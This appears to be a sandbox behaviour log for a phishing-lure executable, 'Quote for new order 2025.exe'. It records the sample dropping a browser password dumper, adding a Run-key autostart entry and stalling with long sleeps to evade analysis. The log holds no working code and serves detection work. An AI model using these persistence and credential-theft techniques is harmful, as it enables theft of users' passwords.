Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Source: C:\Users\user\Desktop\Chrom.exe | File opened: C:\Users\user\Desktop\Chrom.cfg
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | File opened: C:\Windows\SysWOW64\MsftEdit.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Quote for new order 2025.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Quote for new order 2025.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Quote for new order 2025.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \obj\Debug\FoxmaiI.pdb | source: Quote for new order 2025.exe
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb | source: Quote for new order 2025.exe, Chrom.exe.0.dr
Source: Quote for new order 2025.exe | Static PE information: TimeDateStamp 0xBB5322FD [Sat Aug 3 20:37:17 2069 UTC] (compile timestamp lies in the future)
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW, 4_2_004053E1
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0798F200 push eax; iretd 0_2_0798F201
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0798EA18 pushad ; retf 0_2_0798EA19
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CBE1 push edx; iretd 0_2_09E5CBE2
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CBE9 push edx; iretd 0_2_09E5CBEA
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5ABF8 pushad ; iretd 0_2_09E5ABF9
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CBC1 push edx; iretd 0_2_09E5CBC2
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CBC8 push edx; iretd 0_2_09E5CBCA
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E583A8 push ds; iretd 0_2_09E583AA
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E583B1 push ds; iretd 0_2_09E583B2
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5DBBB pushad ; iretd 0_2_09E5DBD2
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5E308 push esp; iretd 0_2_09E5E309
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CA90 push ecx; iretd 0_2_09E5CA92
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E57223 push ss; iretd 0_2_09E57226
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CD60 push ebx; iretd 0_2_09E5CD62
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CD68 push ebx; iretd 0_2_09E5CD6A
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CD01 push ebx; iretd 0_2_09E5CD02
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CD09 push ebx; iretd 0_2_09E5CD0A
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5DD10 pushad ; iretd 0_2_09E5DD12
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5951C pushfd ; iretd 0_2_09E5951D
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5DD19 pushad ; iretd 0_2_09E5DD1A
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CD18 push ebx; iretd 0_2_09E5CD1A
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CC90 push edx; iretd 0_2_09E5CC92
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5DC90 pushad ; iretd 0_2_09E5DC92
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CC98 push edx; iretd 0_2_09E5CC9A
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5DC98 pushad ; iretd 0_2_09E5DC9A
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CC5F push edx; iretd 0_2_09E5CC62
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5CC3F push edx; iretd 0_2_09E5CC42
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5AC00 push esp; iretd 0_2_09E5AC01
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5DC19 pushad ; iretd 0_2_09E5DC1A
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00446B75 push ecx; ret 4_2_00446B85
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044DDB0 push eax; ret 4_2_0044DDC4
Source: Quote for new order 2025.exe | Static PE information: section name: .text entropy: 6.87952860455371
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | File created: C:\Users\user\Desktop\Chrom.exe (dropped file)
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Application (2 occurrences)
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Chrom.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 1550000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 3450000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 3170000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 970000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 2560000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 4560000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 1140000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 2AA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: 4AA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Chrom.exe Code function: 4_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle 4_2_0040BAE3
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7652 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7652 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7652 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7972 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7972 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 1344 Thread sleep count: 199 > 30
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7972 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 3848 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 3848 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7944 Thread sleep count: 200 > 30
Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 3848 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Chrom.exe Code function: 4_2_0040B477 FindFirstFileW,FindNextFileW 4_2_0040B477
Source: C:\Users\user\Desktop\Chrom.exe Code function: 4_2_0041A8D8 memset,GetSystemInfo 4_2_0041A8D8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Thread delayed: delay time: 922337203685477
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: Quote for new order 2025.exe, 00000000.00000002.3543376983.00000000080DE000.00000004.00000020.00020000.00000000.sdmp, Quote for new order 2025.exe, 00000005.00000002.3541044166.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, Quote for new order 2025.exe, 0000000B.00000002.3539781013.0000000007085000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bhv428D.tmp.14.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Process information queried: ProcessInformation
